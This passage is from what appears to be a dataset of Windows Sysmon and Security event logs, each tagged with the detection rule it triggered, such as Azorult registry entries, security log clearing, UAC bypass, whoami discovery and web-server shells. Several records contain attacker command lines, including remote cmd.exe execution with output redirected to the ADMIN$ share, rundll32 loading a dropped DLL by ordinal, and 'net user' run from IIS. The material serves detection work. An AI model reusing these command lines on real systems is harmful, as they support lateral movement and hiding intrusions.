19:17:44.203"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":38292,"Execution_attributes":{"ProcessID":2956,"ThreadID":2088},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-09-08T19:17:44.249169Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-64F9-5D75-0000-001038560000","ProcessId":576,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\PSEXESVC\\Start","UtcTime":"2019-09-08 19:17:44.296"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":38294,"Execution_attributes":{"ProcessID":2956,"ThreadID":2088},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-09-08T19:17:44.350762Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult 
Malware"],"event":{"Event":{"EventData":{"Details":"%%SystemRoot%%\\PSEXESVC.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-64F9-5D75-0000-001038560000","ProcessId":576,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\PSEXESVC\\ImagePath","UtcTime":"2019-09-08 19:17:44.296"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":38295,"Execution_attributes":{"ProcessID":2956,"ThreadID":2088},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-09-08T19:17:44.391389Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Remote PowerShell Session Host Process (WinRM)"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\HOSTNAME.EXE\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\administrator\\Documents\\","Description":"Hostname APP","FileVersion":"6.3.9600.16384 (winblue_rtm.130821-1623)","Hashes":"SHA1=4ED8B225C9CC97DD02C9A5DFD9F733C353F83E36,MD5=74D1E6E8AC6ABCC1DE934C8C5E422B64,SHA256=CA40BB9470E8E73767F3AA43DDF51F814481167DEC6C2FAA1996C18AB2C621DB,IMPHASH=65F157041816229C2919A683CBA86F70","Image":"C:\\Windows\\System32\\HOSTNAME.EXE","IntegrityLevel":"High","LogonGuid":"DFAE8213-BEAD-5CDC-0000-0020AFDA1500","LogonId":"0x15daaf","ParentCommandLine":"C:\\Windows\\system32\\wsmprovhost.exe -Embedding","ParentImage":"C:\\Windows\\System32\\wsmprovhost.exe","ParentProcessGuid":"DFAE8213-BEAD-5CDC-0000-0010DDDB1500","ParentProcessId":3332,"ProcessGuid":"DFAE8213-BF0B-5CDC-0000-00105A951600","ProcessId":2936,"Product":"Microsoft® Windows® Operating System","RuleName":"Lateral Movement - Windows Remote 
Management","TerminalSessionId":0,"User":"insecurebank\\Administrator","UtcTime":"2019-05-16 01:38:19.616"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":1,"EventRecordID":18002,"Execution_attributes":{"ProcessID":1792,"ThreadID":2232},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-16T01:38:19.630865Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"WIN-77LTAPHIQ1R.example.corp","Correlation":null,"EventID":1102,"EventRecordID":566821,"Execution_attributes":{"ProcessID":780,"ThreadID":3480},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-03-19T00:02:00.383090Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x4fd77","SubjectUserName":"administrator","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-500"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Call by Ordinal"],"event":{"Event":{"EventData":{"CommandLine":"cmd.exe /Q /c c:\\windows\\system32\\rundll32.exe c:\\programdata\\7okjer,#1 1> \\\\127.0.0.1\\C$\\WqEVwJZYOe 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-75D0-5F8B-0000-0020A8A83300","LogonId":"0x33a8a8","OriginalFileName":"Cmd.Exe","ParentCommandLine":"C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","ParentProcessGuid":"747F3D96-75D1-5F8B-0000-00101DAB3300","ParentProcessId":2228,"ProcessGuid":"747F3D96-75D1-5F8B-0000-001088C23300","ProcessId":2784,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"MSEDGEWIN10\\Administrator","UtcTime":"2020-10-17 22:53:05.776"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":421227,"Execution_attributes":{"ProcessID":3236,"ThreadID":4832},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-17T22:53:05.777453Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-12-09 22:45:33.087","Image":"System","ProcessGuid":"747F3D96-CDE2-5FD1-0000-0010EB030000","ProcessId":4,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\onedrive.exe","UtcTime":"2020-12-09 
22:45:33.087"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":549541,"Execution_attributes":{"ProcessID":3428,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-12-09T22:45:33.090853Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":1102,"EventRecordID":2171289,"Execution_attributes":{"ProcessID":420,"ThreadID":996},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2020-09-02T11:47:39.499106Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"3B","SubjectLogonId":"0x38a14","SubjectUserName":"a-jbrown","SubjectUserSid":"S-1-5-21-308926384-506822093-3341789130-1106"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution Anomaly"],"event":{"Event":{"EventData":{"CommandLine":"cmd.exe /Q /c whoami /all 1> \\\\127.0.0.1\\ADMIN$\\__1556656369.7 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 
(win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B0F2-5CC8-0000-00203D311D00","LogonId":"0x1d313d","ParentCommandLine":"C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","ParentProcessGuid":"365ABB72-B0C0-5CC8-0000-001017C31C00","ParentProcessId":836,"ProcessGuid":"365ABB72-B0F3-5CC8-0000-0010C43A1D00","ProcessId":2828,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:32:51.324"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9828,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:32:51.324839Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami /all ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B0F2-5CC8-0000-00203D311D00","LogonId":"0x1d313d","ParentCommandLine":"cmd.exe /Q /c whoami /all 1> \\\\127.0.0.1\\ADMIN$\\__1556656369.7 2>&1","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-B0F3-5CC8-0000-0010C43A1D00","ParentProcessId":2828,"ProcessGuid":"365ABB72-B0F3-5CC8-0000-0010373E1D00","ProcessId":3328,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:32:51.356"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9829,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:32:51.371714Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\svchost.exe","ProcessGuid":"747F3D96-2910-5F86-0000-00109EA10100","ProcessId":2892,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\LanmanServer\\Shares\\staging","UtcTime":"2020-10-13 
23:06:02.878"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":415266,"Execution_attributes":{"ProcessID":3336,"ThreadID":4516},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-13T23:06:02.889794Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\svchost.exe","ProcessGuid":"747F3D96-2910-5F86-0000-00109EA10100","ProcessId":2892,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\LanmanServer\\Shares\\Security\\staging","UtcTime":"2020-10-13 23:06:02.878"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":415268,"Execution_attributes":{"ProcessID":3336,"ThreadID":4516},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-13T23:06:02.889886Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was 
cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"PC01.example.corp","Correlation":null,"EventID":1102,"EventRecordID":433307,"Execution_attributes":{"ProcessID":856,"ThreadID":1660},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-03-18T11:27:00.438449Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x18a7875","SubjectUserName":"user01","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-1106"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-82AE-607F-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":612,"ProcessGuid":"747F3D96-3A89-607F-0000-001028587700","ProcessId":4912,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT 
AUTHORITY\\SYSTEM","UtcTime":"2021-04-20 20:33:13.680"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":578503,"Execution_attributes":{"ProcessID":3392,"ThreadID":4112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2021-04-20T20:33:13.741579Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k LocalService -p -s fdPHost","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-82AF-607F-0000-0020E5030000","LogonId":"0x3e5","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":612,"ProcessGuid":"747F3D96-3A8A-607F-0000-0010E4717700","ProcessId":5280,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\LOCAL SERVICE","UtcTime":"2021-04-20 
20:33:14.246"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":578505,"Execution_attributes":{"ProcessID":3392,"ThreadID":4112},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2021-04-20T20:33:14.273416Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32 url.dll,FileProtocolHandler ms-browser://","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-2842-5E1E-0000-0020FF3A7A00","LogonId":"0x7a3aff","OriginalFileName":"RUNDLL32.EXE","ParentCommandLine":"C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","ParentProcessGuid":"747F3D96-2842-5E1E-0000-0010903C7A00","ParentProcessId":1628,"ProcessGuid":"747F3D96-2842-5E1E-0000-00100C417A00","ProcessId":4180,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-01-14 
20:44:50.348"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":336,"Execution_attributes":{"ProcessID":1840,"ThreadID":8032},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-01-14T20:44:50.353148Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32 url.dll,OpenURL ms-browser://","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-28B3-5E1E-0000-002057EB7B00","LogonId":"0x7beb57","OriginalFileName":"RUNDLL32.EXE","ParentCommandLine":"C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding","ParentImage":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","ParentProcessGuid":"747F3D96-28B3-5E1E-0000-0010CAEC7B00","ParentProcessId":1632,"ProcessGuid":"747F3D96-28B3-5E1E-0000-00101DF17B00","ProcessId":3412,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-01-14 
20:46:43.232"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":340,"Execution_attributes":{"ProcessID":1840,"ThreadID":8032},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-01-14T20:46:43.237922Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /all","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Documents\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5B3A-5CC7-0000-002096080100","LogonId":"0x10896","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -s -NoLogo -NoProfile","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-65A9-5CC7-0000-00104E5C2400","ParentProcessId":3376,"ProcessGuid":"365ABB72-65AA-5CC7-0000-00104D882400","ProcessId":2116,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-29 
20:59:22.128"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":8050,"Execution_attributes":{"ProcessID":1896,"ThreadID":1820},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-29T20:59:22.144046Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"PC01.example.corp","Correlation":null,"EventID":1102,"EventRecordID":432901,"Execution_attributes":{"ProcessID":856,"ThreadID":2200},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-03-18T11:06:25.485214Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x18a7875","SubjectUserName":"user01","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-1106"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MSHTA Spwaned by SVCHOST"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\System32\\mshta.exe -Embedding","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft (R) HTML Application host","FileVersion":"11.00.9600.16428 
(winblue_gdr.131013-1700)","Hashes":"SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A","Image":"C:\\Windows\\System32\\mshta.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-19E0-5CDA-0000-0020CE701000","LogonId":"0x1070ce","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentProcessGuid":"365ABB72-965E-5CDA-0000-0010AF760000","ParentProcessId":596,"ProcessGuid":"365ABB72-19E0-5CDA-0000-001006711000","ProcessId":1932,"Product":"Internet Explorer","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-14 01:29:04.293"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":17589,"Execution_attributes":{"ProcessID":2000,"ThreadID":1960},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-14T01:29:04.306885Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Shells Spawned by Web Servers"],"event":{"Event":{"EventData":{"CommandLine":"\"c:\\windows\\system32\\cmd.exe\" /c net user","Company":"Microsoft Corporation","CurrentDirectory":"c:\\windows\\system32\\inetsrv\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 
